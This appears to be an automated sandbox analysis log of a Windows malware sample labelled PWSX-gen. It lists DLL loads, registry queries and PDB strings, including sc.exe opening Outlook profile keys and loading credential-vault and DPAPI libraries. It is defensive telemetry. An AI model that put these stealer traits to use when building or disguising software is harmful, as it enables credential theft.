            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: gnsdk_fp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmvcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dwmapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mfperfhelper.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmasf.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mfperfhelper.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmploc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: atlthunk.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: jscript.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: textshaping.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windowscodecs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: textinputframework.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: coreuicomponents.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: coremessaging.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: coremessaging.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mmdevapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: devobj.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mfplat.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rtworkq.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: audioses.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: powrprof.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: umpdc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.ui.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windowmanagementapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: inputhost.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: netprofm.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: npmproxy.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dataexchange.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: d3d11.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dcomp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dxgi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wtsapi32.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winsta.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: imapi2.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mswmdm.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cewmdm.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmdmps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: upnp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ssdpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: linkinfo.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ntshrui.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cscapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: policymanager.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msvcp110_win.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: shsvcs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmpps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.security.authentication.onlineid.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: onesettingsclient.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: webio.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptnet.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: comppkgsup.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: xmllite.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: sppc.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: version.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wmp.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wmvcore.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: dwmapi.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: mfperfhelper.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wmasf.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wmploc.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: mmdevapi.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: mfplat.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: rtworkq.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: audioses.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: windows.ui.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: windowmanagementapi.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: inputhost.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: mlang.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: winmm.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wmnetmgr.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: msxml3.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wdigest.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\unregmp2.exeSection loaded: wmpps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic file information: File size 2928646 > 1048576
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdbUGP source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: sc.pdb source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCoe source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: pC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb` source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp, WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0e source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
